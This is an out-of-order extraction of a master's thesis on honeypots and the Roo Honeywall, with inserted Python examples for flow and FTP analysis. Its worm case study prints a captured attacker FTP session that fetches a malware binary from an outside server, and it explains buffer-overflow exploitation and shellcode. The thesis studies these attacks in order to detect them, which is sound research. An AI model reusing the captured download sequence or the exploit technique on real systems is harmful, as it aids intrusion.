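        print(f"{name:<10} {classify_tcp_flow(flow)}")
```

A connect scan is visible to the target application (the socket is accepted and closed), whereas a half-open scan never reaches it; both leave the Honeywall's flow record with zero payload, which is why payload volume is the first thing to sort on when triaging flows.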
21. [Appendix B, page B-26: packet dump continued. Recoverable headers: a 40-byte datagram (Ethernet type 0x800, len 0x3C, IpLen 20, DgmLen 40, DF) with Seq 0x2B47D99A, Ack 0x51462D8E, Win 0x4380, TcpLen 20; a 79-byte datagram (len 0x5D, DgmLen 79, DF) with Seq 0x2B47D99A, Ack 0x51462D8E; then 40-byte segments with Seq 0x51462D8E / Ack 0x2B47D9C1 and Seq 0x2B47D9C1 / Ack 0x51462D8F, i.e. the closing exchange; addresses and remaining payload garbled beyond recovery]
22. [figure: flows aggregated by dst port between two dates in May (columns: dst port, flows, packets, bytes); the table was rotated in the extraction and is not recoverable]

B.5 Setup description for Roo
There are two different setup scenarios. The first is a regular installation on a machine's hardware. The second is installing Roo under VMware Workstation. The second option has some interesting advantages: it allows installing an entire Honeynet on a single computer. This saves money for hardware and makes it easily portable, e.g. on a laptop. The current version (June 25, 2005) is Roo v1.0 hw-139, abbreviated Roo 139.

1 Download
Roo is available on the Honeynet Project's homepage, where you can also download the official manual. After downloading it is highly recommended to verify the MD5 checksum. Calculation of the checksum should be performed on a UNIX operating system, since Windows treats line ends differently (it uses CR LF while UNIX uses LF).

2 Regular installation
2.1 System requirements: CPU Pentium IV (min. Pentium III, sufficient for an experimental system; AMD is also
23. ... IV 2.4 GHz, main memory 1 GB, hard disk 40 GB, network adapter 1 NIC, CD-ROM. If no direct connection to the internet is available you need a CD-ROM to copy the image.

3.2 Setup
After opening VMware perform the following steps:
1. New Virtual Machine
2. Select the appropriate configuration: Custom
3. Select a guest operating system: Linux, Other Linux 2.6.x kernel
4. Name the virtual machine: Roo 139 (Roo 139 is the current version); path of the VMware image
5. Memory for the virtual machine: 512 MB
6. Network type: use bridged networking
7. Select I/O adapter types: BusLogic
8. Select a disk: create a new virtual disk
9. Select a disk type: SCSI
10. Specify disk capacity: 10 GB, allocate disk space now
11. Dialog warning: yes
12. Specify disk file: Roo 134
(Honeynet Project: http://www.honeynet.org/tools/cdrom/Roo/iso/current)
13. Disk creating process
14. Done

Before booting the Honeywall you have to add two virtual network adapters:
1. On the main menu: VM / Settings
2. CD-ROM: change to iso file, path of the iso image
3. NICs: add > hardware type Ethernet Adapter > network type Host-only
4. NICs: add > hardware type Ethernet Adapter > network type Host-only
5. Audio: remove
6. OK
[figure: VMware Workstation window, menu File / Edit / View / VM / Power / Snapshot / Windows / Help]
24. 6.3 Outlook to future research
From the current point of development, Honeypots will advance to process more protocols. Roo is not yet capable of automatically processing protocols other than IP, TCP, UDP and ICMP. In the future more protocols will be processed automatically. This will also extend the range of Honeypots: current techniques focus on computers, but it would also be important to monitor network devices such as routers or layer 3 switches. As intrusion detection systems advance to distributed systems, so can Honeypots. Consider a scenario where an operator has deployed several Honeynets on different networks. It would improve analysis if the captured information were automatically retrieved and gathered at a central point. Current developments of data mining systems could be adapted to analyze Honeypot data. This would allow better statements on current threats and show trends in attacking techniques.

A References
[BIPM 98] Bureau International des Poids et Mesures (BIPM): The International System of Units (SI), 7th edition, 1998.
[CNNMoney 05] Jeanne Sahadi: 40M credit cards hacked. CNNMoney news article on credit card theft at MasterCard, http://money.cnn.com/2005/06/17/news/master_card, Cable Ne
[Fyodor 05], [Honeynet 04], [Honeynet 05], [IANA 05], [Intel 97], [Kaspersky 05], [Kirchner 93]: entry text not recoverable from the extraction
25. another network would only make sense if the Honeywall is physically located in a protected and locked server room and the operator has access to the local network.

figure 4.4: layout of VMware installation

Setup VMware host:
  CPU: Pentium IV 2.80 GHz
  RAM: 1024 MB
  Harddisk: 150 GB
  Chipset: Intel 82801EB
  NIC: Realtek RTL8139/810X
  Software OS: Windows XP SP2 Build 2600.xpsp2_gdr.050301-1519
  additional S/W: VMware 4.5.2 Build 8848
figure 4.5: setup details VMware host FHD

Setup Honeypot and Honeywall:
  Virtual machines: Honeypot, Honeywall
  VMnet8: host only
  VMnet0: bridged to physical network
  installed fixes: no Service Packs or Hotfixes installed
figure 4.6: setup Honeywall FHD

4.4 Implementing the Honeywall

The type of machine, real or virtual, does not matter to Roo. The operating system is installed as usual. Device drivers are available for both platforms and included in the default distribution. The main difference between the
26. cases this would be sufficient, but Honeypots are dedicated to watch and learn new threats, and this requires outbound connections. However, a production Honeypot with a low level of interaction can be configured with no outbound access; the risk involved in this setup can be neglected. Thus it appears that different setups involve different risks. An implementer has to carefully consider this when planning a configuration. A good practice is to deny the Honeypot access to any production device and to open communication paths to the public network. Additionally, the access to the public network needs to be limited. Without this limitation the Honeypot could be used to execute a DoS or a DDoS attack or to store stolen software. This requirement can be reached by limiting the number and size of connections to the outside. With more advanced techniques such as an Intrusion Protection System it is possible to filter individual flows matching predefined patterns. This would ban the propagation of worms and separate them from advanced attacks.

3.6.2 Cloaking the Honeypot

The ideal solution would be to tap the monitoring device to a hub between Honeypot and the network and capture all traffic. This would hide the presence of the monitor or Honeywall. In case of denying outbound traffic from the Honeypot this would be a good solution. But this would allow passive monitoring only and lack controlling. Chapter 3.6.1 mentions the importance of a c
27. his or her ability to pursue his interest illegally. They are often economically motivated or may be representing a political cause. Sometimes, however, it is pure curiosity [Wikip 05]. The term Blackhat is derived from old Western movies, where outlaws wore black hats and outfits and heroes typically wore white outfits with white hats. Whitehats are ethically opposed to the abuse of computer systems. A Whitehat generally concentrates on securing IT systems, whereas a Blackhat would like to break into them. Both Blackhats and Whitehats are hackers. However, both are skilled computer experts, in contrast to the so called script kiddies. Actually script kiddies could be referred to as Blackhats, but this would be a compliment to such individuals. From the work of real hackers, script kiddies extract discovered and published exploits and merge them into a script. They do not develop their own exploits or discover vulnerabilities. Instead they use tools published by the Blackhat community and create random damage.

A worm is an individual program routine which attempts to self-replicate over networks. After infection, worms often download and install software on the target to get full control. That software is often referred to as Backdoor or Trojan Horse. Worms can propagate in various ways. A prepared link on a website can launch the worm routine, or an attachment sent in an email can contain malicious code. The method of propagation invest
28. learn about the tactics of hackers. So far, network monitoring techniques use passive devices such as Intrusion Detection Systems (IDS). IDS analyze network traffic for malicious connections based on patterns. Those can be particular words in packet payloads or specific sequences of packets. However, there is the possibility of false positive alerts due to a pattern mismatch or, even worse, false negative alerts on actual attacks. On a Honeypot every packet is suspicious. The reason for this is that in a Honeypot scenario the Honeypot is not registered to any production system. Regular production systems should not be aware of the presence of a Honeypot. Also, the Honeypot should not provide any real production data. This ensures that the Honeypot is not connected to by trustworthy devices. Therefore, any device establishing a connection to a Honeypot is either wrongly configured or the source of an attack. This makes it easy to detect attacks on Honeypots (see 3.6.5).

2 Concept, architecture and terms of a Honeypot

This chapter defines concepts, architecture and terms used in the realm of Honeypots. It describes the possible types of Honeypots and the intended usage and purpose of each type. Further auxiliary terms are explained to gain a deeper understanding of the purpose of Honeypot concepts.

2.1 Blackhats and Whitehats

In the computer security community a Blackhat is a skilled hacker who uses
29. of hiding its own existence. They are easy to fingerprint and easily discovered by advanced Blackhats. In addition, there is no sensor on the Honeynet operating system. This means that traffic is recorded but events on the host are not separately stored and can be wiped out by the intruder. A Honeynet is accessed from the outside by a common layer 3 firewall. Gen II nets are further developed and harder to detect. They offer recording on the host's side, and even if the connection to the attacker is encrypted they can record keyboard strokes. Access is granted by a layer 2 firewall, which is hard to detect and fingerprint as it does not even have an IP address. Figure 2.2 shows a network diagram of a Honeynet setup with four Honeypots. The Honeywall acts in bridge mode (network layer 2, [OSI 94]), which is the same function as performed by switches. This connects the Honeynet logically to the production network and allows the Honeynet to be in the same address range.

figure 2.2: Honeynet setup. External Network; Firewall 192.168.10.254; Production PCs 192.168.10.1, 192.168.10.2, 192.168.10.3; Honeywall (no IP); Honeynet 192.168.10.0/24 with Honeypots 192.168.10.4, 192.168.10.5, 192.168.10.6, 192.168.10.7

2.4 Level of interaction

In the previous chapters Honeypots were de
30. of time. To circumvent this common problem, test cases were developed which, once successfully completed, ensure that errors are discovered before the experiment starts. Setup requirements form the basis for these test cases. The following chapter will examine the requirements and clarify their necessity. The full version of the test cases used during the experiments can be found in the appendix (see B.1). All tests can be executed with on-board tools. This is important for the setup of the Honeypot, as third party tools could reveal its true purpose. Therefore tests developed in future should concentrate on on-board tools to avoid detection. The basic tests use a console and TCP/IP based tools such as bash on Linux and cmd.exe on Windows; nslookup is available on both platforms; date on Windows only displays the date, here time needs to be executed as well, while the Linux pendant of date displays time and date.

A good requirement states something that is necessary, verifiable and attainable. This chapter states the requirements and explains each need. Verification is done with the test plan found in the appendix. Most requirements are easy to attain with on-board tools or applications which are installed with the default setup of Roo. Requirement R002 is the only one which could benefit from a third party tool such as a radio clock.

The following requi
31. option would be to use the user Administrator or root, which have system privileges and therefore full access to the operating system.

Hackers concentrate on attempts to get system privileges. To do this they scan hosts for open ports and try to exploit vulnerabilities. Then some code is inserted into the victim's memory which gains system privileges and establishes a connection to the attacker. Now the system is under control of the Blackhat and can be used for his purposes.

5.2.2 How exploits work

To better understand how exploits work, the following part will give a description of how buffer overflows work. The example is based on program operation and intended memory usage on an Intel x86 processor architecture. The goal of an exploit is to execute some code which performs actions to connect back to the attacker and allow remote controlling. This code can contain calls to system libraries or code which executes commands at the console; in hacker terms that certain type of code is called shellcode.

General program execution: figure 5.5 shows the memory usage of a process in the main memory. It is structured in three parts: code, heap, stack. The code is stored at lower address ranges. It contains processor related directives in binary representation. The area above is used by the process heap. It is used to store global and dynamic variables. In heap based memory
32. protected environment. As discussed in 2.6, Honeypots add little value to prevention. Therefore the investigation will focus on detecting attacks. If this research shows that there are many attacks of choice, it would be worthwhile to establish a Honeypot to analyze the motives of the intruders. But at the very beginning of this project it seems better to detect and learn about the attacks at FH Darmstadt. Response is necessary to stop attacks, but right now it is not possible to figure out specific responses, as we do not know what exactly is happening at the department's network. Therefore only standard responses are likely, such as improving firewall rules and system policies.

4.2 Evaluation of current solutions

The Honeynet Project [Honeynet 05] has developed a Linux based solution which boots directly from CD and installs a high interaction Honeypot solution named Roo. A global beta test started at the end of March, and fortunately Roo could be investigated in this project. Further, two other solutions seem to be interesting: Honeyd, a low interaction Honeypot, and domino, a distributed IDS solution which monitors dark IP addresses.

4.2.1 Roo

A Honeynet is a high interaction Honeypot with advanced monitoring and controlling techniques. Roo is based on the Honeynet's Gen II architecture and is freely available on [Honeynet 05]. The minimum setup consists of two computers, one which play
33. recorded evidence of attacks. The system can provide information for statistics of attacks that happened per month. Attacks performed by employees are even more critical. Typically an employee is assigned a network account with several user privileges. In many cases networks are closed to the outside but opened to the local network. Therefore a person with legal access to the internal network can pose an unidentifiable threat. Activities on Honeypots can be used to prove if that person has malicious intentions. For instance, a network folder with faked sensitive documents could be prepared. An employee with no bad intentions would not copy the files, but in the case the files are retrieved this might reveal him as a mole. Another benefit, and the most important one, is that a Honeypot detects attacks which are not caught by other security systems. An IDS needs a database with frequently updated signatures of known attacks. What happens if a Blackhat has found an unknown vulnerability? Chapter 2.6 gives a more detailed description on how a Honeypot can help detecting attacks.

2.3.3 Research Honeypot

A research Honeypot is used in a different scenario. A research Honeypot is used to learn about the tactics and techniques of the Blackhat community. It is used as a watch post to see how an attacker is working when compromising a system. In this case the intruder is allowed to stay and reveal his sec
34. figure 5.12: screenshot of Ethereal (Transmission Control Protocol)
1) Ethereal: http://www.ethereal.com

With all tools described above it is very convenient to analyze Honeynet traffic. More than that, Roo offers the opportunity to do this very quickly. However, some minor features are still missing. Chapter 6.1 discusses some features which would improve the benefit of Roo.

5.3.2 Case study: Caught worm

The data shown in this chapter was extracted from an experiment in June. It was chosen to demonstrate that especially alerts of low priority can contain important data. The setup was the same as in 4.3.1 (Roo_Mue, WinXP).

June 23rd 17:05:44 (00:00:04) 24.58.107.92 -> 192.168.10.39 TCP 4654 0 kB 4 pkts > microsoft-ds FIN windows < 0 kB 2 pkts
June 23rd 17:05:53 (00:00:03) <2 SHELLCODE x86 inc ebx NOOP 84.58.107.92 -> 192.168.10.39 TCP 4770 4 kB 10 pkts > microsoft-ds FIN os unkn 0 kB 7 pkts
figure 5.13: suspicious flow

The first flow is a scan for port 445. This port is listed in [IANA 05] as microsoft-ds, used by Windows XP for sharing network resources via CIFS (Common Internet File System). CIFS has been standardized by the Storage Networking Industry Association [SNIA 02] and is used by Microsoft operating systems with some changes. Unfortunately Microsoft has not released a document with details of its
35. 0xFF1C  54 68 69 73 20 69 73 20 61 20 68 61 72 6D 6C 65 73 73 20 73 74 72 69 6E 67 20 3A 2D 29 00  "This is a harmless string :-)"
0xFF10
figure 5.6: stack filled with valid variables

The figure above shows the stack filled with valid variables. The problem is that it is possible to write more than 29 bytes into variable b. If the routine does not check the length of the string and discard the 30th and following bytes, it will overwrite variable c and the rest of the stack. A read on b would give the correct string, but a read on c would output parts of b, which would be a program error already. In the case that the string written into b is even larger than the rest of the stack, it starts from the top again. But now it would overwrite the return address and the base pointer. An end of the sub routine would now read the corrupted return address and load the instruction pointer with a corrupted address. Usually the program would now fail and result in an error.

An exploit code is now facing two problems:
  - the address of the return instruction is unclear
  - the absolute memory area of the process is unclear

Without the exact size of the stack it is not possible to calculate the amount of bytes needed to exactly overwrite the return code. Hence the exploit code contains the new return address multiple times. The return address needs to point to a place where the malicious code was in
37. 0 kB 9 pkts
June 19th 14:02:43 (00:00:01) 84.58.35.142 -> 192.168.10.39 TCP 2532 0 kB 3 pkts > 12045 windows < 0 kB 3 pkts
June 19th 14:02:45 (00:00:02) 84.58.52.111 -> 192.168.10.39 TCP 4126 0 kB 3 pkts > 1957 windows < 0 kB 3 pkts
June 19th 14:02:49 (00:00:00) <1 ICMP Destination Unreachable (Port Unreachable) 192.168.10.39 -> 84.58.96.178 ICMP 0 0 kB 0 pkts > 0 os unkn < 0 kB 0 pkts
June 19th 14:02:49 (00:00:00) 192.168.10.39 -> 84.58.96.178 ICMP 0 0 kB 1 pkts > 0 URP os unkn < 0 kB 0 pkts
figure 5.11: screenshot of Roo's detailed flow output

A click on the disk symbol allows downloading the binary packet dump to a protocol reader. The best tool for reading the packets is Ethereal (1); it is available for a wide range of operating systems and has excellent filtering capabilities.

(screenshot: tftp example pcap opened in Ethereal)
38. B.1 ... B-5
B.2 Packet payload example of chapter 5.3.2 ... B-19
B.3 Setup instruction ... B-28
B.4 Records of Roo_Die and Roo_Mue ... B-34
B.5 Setup description for Roo ... B-37

List of figures
figure 2.1 deployment scenario of a single Honeypot ... 4
figure 2.2 Honeynet setup ... 7
figure 3.1 unprotected environment ... 13
figure 3.2 protected environment ... 14
figure 4.1 project plan ... 23
figure 4.2 setup at IMM ... 27
figure 4.3 setup Honeypot Mühltal ... 28
figure 4.4 layout of VMware installation ... 31
figure 4.5 setup details VMware host FHD ... 32
figure 4.6 setup Honeywall FHD ... 32
figure 4.7 list of Roo's components ... 33
figure 5.1 example of a test case ... 42
f
46. ICMP messages were invoked by executing the Test Cases. So none of those were unexpected alerts. ICMP messages on Roo_Mue Win2000 show a different behavior. Here the Honeypot was compromised by several worms. Reading the logs reveals that there is a different behavior between inbound and outbound messages. Inbound messages were represented with 11 %, while outbound messages came to 89 %. The inbound messages were ping messages to determine the availability of the Honeypot. About half of the outbound messages were sent to two different IPs. Obviously this was some kind of control host where the worm wanted to connect to. The other half is random, with at most 4 messages per flow and IP.

Port 69 is used by the TFTP protocol. It is very interesting that only 0.27 % (Win2000) resp. 0.96 % (WinXP) caused 26.54 % resp. 18.15 % of the alerts. This is due to the rating of TFTP Get messages: Snort rates a TFTP Get with 2 points, no matter if this download attempt was successful or not. None of the alerts lists a response to the Get messages. The cause for this might be a bad or broken worm configuration. In early experiments some TFTP downloads were successful, so TFTP in general should work. Also some tests to determine if TFTP might be unusable in a Scenario IV setup showed that it can work with private addresses. So the conclusion to this is a bad worm design which was not able to propagate properly. Luckily this is good in a non Honeypot use.

Flows on the http port
47. Improving network security with Honeypots
Honeypot Project
Master's thesis by Christian Döring
Supervisor: Prof. Dr. Heinz Erich Erbs, University of Applied Sciences Darmstadt, Department of Informatics
Co-supervisor: Jim Gast, Ph.D., Assistant Professor, University of Wisconsin Platteville, Department of Computer Science

Statutory declaration: I hereby declare that I have produced the present thesis independently and only with the aids indicated. Darmstadt, 1 July 2005

Abstract
This document gives an overview on Honeypots and their value to network security. It analyzes the requirements for a Honeypot setup and proposes some Test Cases for this purpose. Some examples from experiments with Honeypots are explained and analyzed.

List of Indexes
1 Why do Honeypots improve network security ... 1
2 Concept, architecture and terms of a Honeypot ... 2
2.1 Blackhats and Whitehats ... 2
2.2 ... 3
2.3 Types of Honeypots ... 3
2.4 Level of interaction ... 8
2.5 ... 9
2.6 ... 10
2.7 ... 11
3 Honeypots in the field of application ... 13
3.1 Scenario I: unprotected environment
48. Passwd for user
Passwd for root
Run SSH at Startup: Yes / No
Start SSH now: Yes / No
Inbound Access to Mgmt Interface (eth2):
  - Allowed inbound TCP ports
  - IP addresses that can access mgmt interface
Walleye Web GUI: Enable Walleye: Yes / No
Outbound access from Mgmt Interface (eth2):
  - TCP ports gateway can initiate outbound
  - UDP ports gateway can initiate outbound

3 Third Section
3.1 Honeypot Outbound Control Limits
  - Second / minute / hour / day / month
  - TCP limit
  - UDP limit
  - ICMP limit
  - Other limit
  - Send packet through Snort Inline: Yes / No
  - Drop / Reject / Replace Ruleset
3.2 Logging exclusions
  - name of blacklist file or default (def: /etc/blacklist.txt)
  - name of whitelist file or default (def: /etc/whitelist.txt)
  - Enable blacklist and whitelist filtering: Yes / No
3.3 Outbound traffic exclusions
  - name of fencelist file or default (def: /etc/fencelist.txt)
  - Enable fencelist filtering: Yes / No
  - Enable roach motel mode: Yes / No

4 Fourth Section
4.1 DNS for Honeypot
Often you want to allow the honeypots unlimited access to specific DNS servers so they can maintain resolution without filling up your outbound connection limits.
  - Allow honeypots to access DNS unrestricted: Yes / No
  - Which honeypot(s) can access DNS unrestricted
  - Which DNS servers do they have unrestricted DNS access to
4.2 Email Alerts
The system has the ability to email infor
49. R002 Time intervals are normal
Need: This ensures that the clock of the computer or virtual machine is using time intervals according to the SI definition of the unit of time, the second [BIPM 98].
On one of the virtual machines during the experiments the time interval ran at half speed. This means that after one minute in real time the clock in the virtual machine showed only 30 seconds passed; after one day the machine displayed only 12 hours passed since the last check. Cases like this are not to be tolerated. Roo uses the NTP protocol [RFC 2030] for time synchronization; please see the man page for the use of the NTP daemon (man ntpd). For Germany the Physikalisch-Technische Bundesanstalt offers time synchronization services via radio transmission [Priester 04], public telephone dial-in according to the European Telephone Time Code [Kirchner 93], and NTP. Several receivers exist which can be attached to local COM ports.
R003 Honeypot is able to establish outbound and inbound connections to the internal network
Need: Honeypot is able to access the internal network in both directions.
In several cases this requirement could not be satisfied. The cabling on a real Honeywall could be wrong, the firewall on Roo could be out of service, the VMware network devices VMnet0 and VMnet8 could be interchanged, VMware Bridge Protocol could be ac
50. B.3 Setup instruction sheet
Initial Setup
During the Initial Setup process you will have to answer the following questions. By identifying these questions now, such as hostname, IP addresses, use of Snort and Snort Inline, you can make your deployment a (hopefully) smoother and simpler process. This document is intended for you to fill out the answers before the actual deployment. The series of questions below are based on deploying a layer two bridge gateway; there will be several additional NAT questions if you enable a layer three routing gateway.
Setup Description
If you have more than one Honeywall running, you can assign it a name. Note that this name is for your own identifying uses; it does not appear in the actual setup.
• Name:
• Date of Setup:
• Roo Version:
• PC or VMware installed:
• Comments:
1 First Section
1.1 I
51. abilities.
figure 4.7: list of Roo's components
eeyore was replaced by Roo; details can be found on http://www.honeynet.org/tools/cdrom/eeyore/download.html. Fedora is RedHat's Open Source distribution, http://www.fedora.com.
Sebek: Sebek is a data capture tool designed to capture the attacker's activities on a Honeypot without the attacker knowing it. It is based on rootkit technologies, which hide the presence of Sebek from logged-on users.
menu: Graphical menu developed by the Honeynet Project to maintain and control a running Honeywall.
Walleye: Web-based monitoring and maintenance tool.
(name illegible in the scan): Packet capture interface to the Linux kernel.
(name illegible in the scan): Web server daemon to publish websites to a network.
p0f: A passive OS network fingerprinting utility for use in IDS environments, Honeypot environments, firewalls and servers.
Argus: Argus is a real-time flow monitor that is designed to perform comprehensive IP network traffic auditing.
iptables: Iptables is a Linux firewall integrated into the kernel. It is a generic table structure for the definition of rulesets. Each rule within an IP table consists of a number of classifiers (iptables matches) and one connected action (iptables target).
swatch: Alerting tool. Swatch is used to monitor log files; when it sees a line matching a pattern specified, it can highlight it and print it out, or run external programs to notify through mail or some other me
52. allocation, the memory is allocated dynamically from a large pool of unused memory called the heap. As variables can be added and removed dynamically, the upper limit of the heap is moving up or down. Stack memory is allocated at higher address ranges. It contains automatic variables and jump addresses. Similar to the heap, the size grows and decreases during run time; but in contrast to the heap, it starts at a high address and grows down to the lower addresses.
[figure 5.5: memory usage of a process. Recoverable labels: stack between 0xFF14 and 0xFF46; code area: start of main program at 0x1000, main program instructions, jump to sub routine at 0x1233, point of return for sub routine at 0x1234, end of main program; start of sub routine, sub routine instructions, end of sub routine (return to main program).]
To know which instruction has to be executed, the Intel architecture uses an instruction pointer (IP). This is a reserved register which points at the address of the next instruction. Code execution starts at the code area at the lowest address and iteratively moves to the next higher directive. If a sub routine is to be called, a jump (call) instruction with an address pointing to the sub routine's code is executed. This stores the address of the instruction pointer to the stack
53. and the corresponding server responses.
client command | server response
<opened a connection to server> | 220 PRIVATE SERVER
USER whOre | 331 User name okay, need password
PASS gotfucked | 230 User logged in, proceed
TYPE I | 200 Type set to I
PORT 192,168,10,39,4,11 | 200 PORT Command successful
RETR kimo.exe | 150 Opening BINARY mode data connection for kimo.exe (78970 Bytes)
 | 421 Connection timed out, closing
figure 5.20: ftp commands
The FTP specifies two mechanisms for establishing transfer connections, the active mode and the passive mode [RFC 959]. In the active mode the connection is initiated from the server to the client, with the IP and port number from the PORT command; in passive mode the connection is initiated from the client to the server. The reason for the failure is the private IP address sent in the PORT command. The private address is not accessible from the public internet; therefore the server is attempting to connect to an address which is not routed back to the Honeypot. To circumvent this it would have been necessary to use passive mode. But, unfortunately for the attacker, ftp.exe does not support this feature. This example shows why it is necessary to differ between scenario 3 and scenario 4: in scenario 3 the download would have succeeded, because there the Honeypot is assigned a public, routable IP address. But as seen in this
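An added example (not from the thesis): decoding the PORT command of figure 5.20 and checking whether the server's active-mode connect-back can ever reach the client, which is why the transfer above timed out behind NAT. The regular expressions, the non-routable address list and the sample addresses (192.168.10.39 is the thesis's Honeypot; 203.0.113.5 and 198.51.100.20 are constructed documentation addresses) are this example's own.

```python
"""Added example, not from the thesis: decode FTP PORT / PASV addresses and
check whether an active-mode data connection can ever reach the client.
Sample addresses are constructed (192.168.10.39 is the thesis's honeypot,
203.0.113.5 stands in for the public address the server sees)."""
import ipaddress
import re

# RFC 959: "PORT h1,h2,h3,h4,p1,p2" and "227 Entering Passive Mode (h1,...,p2)";
# the port is p1*256 + p2 in both cases.
_PORT_RE = re.compile(r"^PORT\s+(\d{1,3}(?:,\d{1,3}){5})\s*$")
_PASV_RE = re.compile(r"^227 .*?\((\d{1,3}(?:,\d{1,3}){5})\)")

# Address blocks that are never routed on the public internet. A server told
# to connect back to one of these in active mode cannot reach the client.
_NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918 private
    "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8")]


def _decode_hostport(six_numbers):
    """'h1,h2,h3,h4,p1,p2' -> (IPv4Address, port), or None if a value > 255."""
    parts = [int(x) for x in six_numbers.split(",")]
    if any(p > 255 for p in parts):
        return None
    ip = ipaddress.IPv4Address(".".join(str(p) for p in parts[:4]))
    return ip, parts[4] * 256 + parts[5]


def parse_port_command(line):
    """Client -> server PORT command (active mode)."""
    m = _PORT_RE.match(line.strip())
    return _decode_hostport(m.group(1)) if m else None


def parse_pasv_reply(line):
    """Server -> client 227 reply (passive mode)."""
    m = _PASV_RE.match(line.strip())
    return _decode_hostport(m.group(1)) if m else None


def is_publicly_routable(ip):
    return not any(ip in net for net in _NON_ROUTABLE)


def classify_active_transfer(port_line, control_peer_ip):
    """Judge the data connection a PORT command asks the server to open.

    Returns (verdict, (ip, port)). 'unroutable' is the thesis's scenario 4
    case: the client sits behind NAT and advertises its private address, so
    the server's connect-back is never routed to it and the RETR times out.
    'mismatch' flags a routable address that differs from the control
    connection's peer, which servers commonly refuse."""
    decoded = parse_port_command(port_line)
    if decoded is None:
        return ("malformed", None)
    ip, port = decoded
    target = (str(ip), port)
    if not is_publicly_routable(ip):
        return ("unroutable", target)
    if ip != ipaddress.IPv4Address(control_peer_ip):
        return ("mismatch", target)
    return ("ok", target)


if __name__ == "__main__":
    # Constructed replay of figure 5.20: the honeypot behind NAT advertises its
    # private address; the server, which sees 203.0.113.5, cannot connect back.
    print(classify_active_transfer("PORT 192,168,10,39,4,11", "203.0.113.5"))
    # Passive mode would have worked: the client connects outward through NAT.
    print(parse_pasv_reply("227 Entering Passive Mode (198,51,100,20,229,115)"))
```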
54. ans
figure 4.7: list of Roo's components (continued)
4.5 Choosing the bait
The Anti-Virus software producer Kaspersky publishes a monthly ranking of currently active viruses and other malware. In the Top 20 ranking for December 2004 [Kaspersky 05], published on January 01, 2005, every virus targets a Win32 platform. Observing the rankings back until April 2005 results in the same target. Therefore Windows 2000 and Windows XP were chosen for the Honeypot.
Rootkit: A rootkit is a set of tools used by an intruder after hacking a computer system. These tools can help the attacker maintain his access to the system. A rootkit typically hides its presence from the user.
5 Running and observing the experiment
From March to June several Honeypot experiments were realized. The challenge was to set up a working scenario and extract useful information. Chapter 5.1 deals with problems of a safe setup and presents requirements for test cases to avoid failures. The proposed test concept is based on experience gained from the realization phase. Chapter 5.2 describes what can be attacked from the internet. Chapter 5.3 explains log analysis with Roo in general. Actual log results are presented in chapter 5.4.
5.1 Requirements for a safe setup
The worst case was when a running setup turned up with an error and made the captured data worthless. This made many results almost useless and wasted a lot
56. athering. It is also the border between a low interaction and a high interaction Honeypot. A high interaction Honeypot such as a Honeynet provides detailed data of how an attack happened, whereas a low interaction Honeypot would not give every detail of the attack. The reason for this is the type of response from the Honeypot: as discussed in chapter 2.4.1, a low interaction Honeypot does not provide full functionality of the emulated service. Honeynets use full working operating systems as Honeypot, therefore any functionality of the operating system is provided. This allows analyzing the attack in every detail. Roo provides several logs and dumps of captured traffic which can be analyzed:
firewall logs: iptables logs every connection in a summarized form, including date, time, protocol, source IP, destination IP, IP header details (TTL etc.).
network binary logs (network captures): These are the actual packets captured by the protocol sniffer of Snort. Contained is the full packet, including header and payload. Roo stores network binaries in the tcpdump format, which can be read by several tools such as tcpdump, Snort or Ethereal.
figure 5.8: log types of Roo
ASCII session logs: Sometimes it is more interesting to read only the payload of a full connection and not only from a single packet. ASCII session logs can be used, i.e., to retrieve transferred files to the Hon
57. be aware of this risk and therefore control the Honeypot on a regular basis.
3.6 Scenario VI: Honeypot out of the box
A Honeypot out of the box is a ready-to-use solution, which also could be thought of as a commercial product. The question is which features are needed. As shown in the previous chapters, there is a wide range of eventualities. A complete product needs to cover security (hide from the attacker), good analyzability (easy access to captured data) and automatic alerting functions to be sufficient.
3.6.1 Secure usage of a Honeypot
A running Honeypot may not, in any circumstances, touch production machines. This is the highest goal of securing a Honeypot. Otherwise a compromised Honeypot would allow taking over sensitive data and machines. Actually a compromised Honeypot should not be able to touch any other machine than the one which infected it, but this would decrease the Honeypot's value to attackers. In some
DoS: Denial of Service attack on a computer system or network that causes a loss of service to users, typically the loss of network connectivity and services, by consuming the bandwidth of the victim network or overloading the computational resources of the victim system.
DDoS: distributed Denial of Service attack; the victim is attacked by several compromised machines at the same time, in contrast to DoS attacks, where only one device launches the attack.
58. e which gives definitions on Honeypot terms and notions. Unfortunately it is not clear who coined the term Honeypot. Spitzner's book lists some early Honeypot solutions, but none of these had "Honeypot" in their name.
2.3 Types of Honeypots
To describe Honeypots in greater detail it is necessary to define types of Honeypots. The type also defines their goal, as we will see in the following. A very good description of those can also be found in [Spitzner 02].
2.3.1 The idea of Honeypots
The concept of Honeypots in general is to catch malicious network activity with a prepared machine. This computer is used as bait. The intruder is intended to detect the Honeypot and try to break into it. Next, the type and purpose of the Honeypot specifies what the attacker will be able to perform. Often Honeypots are used in conjunction with Intrusion Detection Systems. In these cases Honeypots serve as Production Honeypots (see 2.3.2) and only extend the IDS. But in the concept of Honeynets (see 2.3.4) the Honeypot is the major part; here the IDS is set up to extend the Honeypot's recording capabilities.
[figure 2.1: deployment scenario of a single Honeypot. Recoverable labels: External Network; Firewall 192.168.10.254; Local Area Network 192.168.10.0/24; Production PC 192.168.10.1, Production PC 192.168.10.2, Production PC 192.168.10.3; Honeypot 192.168.10.4.]
A common setup is to d
